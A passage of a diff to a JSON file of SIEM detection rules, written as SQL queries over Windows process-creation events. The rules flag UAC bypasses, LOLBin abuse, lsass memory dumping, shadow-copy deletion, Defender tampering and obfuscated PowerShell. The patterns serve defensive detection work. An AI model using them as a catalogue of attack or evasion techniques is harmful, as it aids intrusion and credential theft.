Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR 